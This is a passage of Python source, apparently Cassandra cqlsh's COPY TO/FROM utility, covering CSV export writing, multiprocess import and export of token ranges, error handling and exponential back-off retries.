copy_options['childtimeout'] = int(opts.pop('childtimeout', copy_options['requesttimeout'] + 30))
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machines more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
ret = int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
printdebugmsg("Detected %d core(s)" % (ret,))
return ret
except NotImplementedError:
printdebugmsg("Failed to detect number of cores, returning 1")
return 1
@staticmethod
def describe_interval(seconds):
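# For example, describe_interval(3725.5) returns '1 hour, 2 minutes, and 5.500 seconds'.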
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) // length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On platforms using 'spawn' as the default multiprocessing start method,
this dictionary must be picklable.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug,
coverage=shell.coverage,
coveragerc_path=shell.coveragerc_path
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child (an outpipe from the parent's point
of view) and, vice versa, outpipe is the message pipe flowing from child to parent (an inpipe
from the parent's point of view), hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
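# Minimal sketch of the naming swap described in update_params() above: the pipe the
# parent writes to is handed to the worker as its 'inpipe', and the pipe the parent
# reads from becomes the worker's 'outpipe'. The single-worker wiring below is only
# an example.
def _demo_pipe_wiring():
    to_worker = OneWayPipe()     # parent sends work here; the worker reads it
    from_worker = OneWayPipe()   # the worker reports results here; the parent reads it
    worker_params = {'inpipe': to_worker,
                     'outpipe': from_worker}
    return worker_params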
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = int(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow([ensure_str(c) for c in self.columns])
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file, if any, or else use stdout. Return a namedtuple
containing the output and a boolean indicating whether the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'w'), close=True)
self.num_files += 1
return ret
except IOError as e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate([_f for _f in data.split(os.linesep) if _f]):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = int(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = int(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiate the export by starting the worker processes,
then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = "[" + ", ".join(self.columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in range(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a dict keyed by token range (from, to], where each value records the hosts
that own that range together with bookkeeping counters (attempts, rows, worker number).
Each host is responsible for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if curr < begin_token:
return None
elif (prev is None) or (prev < begin_token):
ret = (begin_token, curr)
if end_token:
if (ret[0] is not None) and (ret[0] > end_token):
return None
elif (curr is not None) and (curr > end_token):
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = list(shell.get_ring(self.ks).items())
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
elif previous is None and (not end_token or previous < end_token):
previous = begin_token if begin_token else min_token
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return: the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None; in
that case we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, list(ranges.keys()))
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a generator of sources. Each source is an open file object for
one of the input paths; each comma separated path may be a glob
expression matching several files.
"""
def make_source(fname):
try:
return open(fname, 'r')
except IOError as e:
raise IOError("Can't open %r for reading: %s" % (fname, e))
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
result = glob.glob(path)
if len(result) == 0:
raise IOError("Can't open %r for reading: no matching file found" % (path,))
for f in result:
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = next(self.sources)
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
next(self.current_source)
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in range(min(max_rows, self.chunk_size)):
try:
row = next(self.current_source)
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return [_f for _f in rows if _f]
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in range(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non-recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(list(self.options.unrecognized.keys())))
return
if not self.validate_columns():
return 0
columns = "[" + ", ".join(self.valid_columns) + "]"
self.printmsg("\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
shell.printerr(str(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in the case of a file, the child process would close it). This is very primitive support
for STDIN import in that we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print()
def import_records(self):
"""
Keep running while there is data to receive or send and while all processes are running.
Send data (batches or retries) up to the maximum ingest rate. While waiting for data to
receive, check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
child_timeout = self.options.copy['childtimeout']
last_recv_num_records = 0
last_recv_time = time.time()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.feeding_result is not None:
if self.receive_meter.total_records != last_recv_num_records:
last_recv_num_records = self.receive_meter.total_records
last_recv_time = time.time()
elif (time.time() - last_recv_time) > child_timeout:
self.shell.printerr("No records inserted in {} seconds, aborting".format(child_timeout))
break
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records() - self.error_handler.num_rows_failed,
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options):
super(FeedingProcess, self).__init__(target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.max_pending_chunks = options.copy['maxpendingchunks']
self.chunk_id = 0
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
try:
reader.start()
except IOError as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
channels = self.worker_channels
max_pending_chunks = self.max_pending_chunks
sent = 0
failed_attempts = 0
while not reader.exhausted:
channels_eligible = [c for c in channels if c.num_pending() < max_pending_chunks]
if not channels_eligible:
failed_attempts += 1
delay = randint(1, pow(2, failed_attempts))
printdebugmsg("All workers busy, sleeping for %d second(s)" % (delay,))
time.sleep(delay)
continue
elif failed_attempts > 0:
failed_attempts = 0
for ch in channels_eligible:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception as exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message if hasattr(exc, 'message') else str(exc)))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
A child worker process; this provides the functionality common to ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
super(ChildProcess, self).__init__(target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
# attributes for coverage
self.coverage = params['coverage']
self.coveragerc_path = params['coveragerc_path']
self.coverage_collection = None
self.sigterm_handler = None
self.sighup_handler = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
def start_coverage(self):
import coverage
self.coverage_collection = coverage.Coverage(config_file=self.coveragerc_path)
self.coverage_collection.start()
# save current handlers for SIGTERM and SIGHUP
self.sigterm_handler = signal.getsignal(signal.SIGTERM)
self.sighup_handler = signal.getsignal(signal.SIGHUP)
def handle_sigterm(signum, frame):
self.stop_coverage()
self.close()
self.terminate()
# set custom handler for SIGHUP and SIGTERM
# needed to make sure coverage data is saved
signal.signal(signal.SIGTERM, handle_sigterm)
signal.signal(signal.SIGHUP, handle_sigterm)
def stop_coverage(self):
self.coverage_collection.stop()
self.coverage_collection.save()
signal.signal(signal.SIGTERM, self.sigterm_handler)
signal.signal(signal.SIGHUP, self.sighup_handler)
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
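# Minimal illustration of the back-off schedule above: the retry delay is drawn
# uniformly from 0..2**(retry_num + 1) - 1 seconds until max_attempts is reached,
# after which backoff() returns -1 and the query is rethrown. max_attempts=5 is
# just an example value.
def _demo_backoff_windows(max_attempts=5):
    for retry_num in range(max_attempts + 1):
        if retry_num >= max_attempts:
            print('retry %d -> give up (backoff returns -1)' % retry_num)
        else:
            upper = pow(2, retry_num + 1) - 1
            print('retry %d -> wait 0..%d seconds' % (retry_num, upper))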
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
A child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
if self.coverage:
self.start_coverage()
try:
self.inner_run()
finally:
if self.coverage:
self.stop_coverage()
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
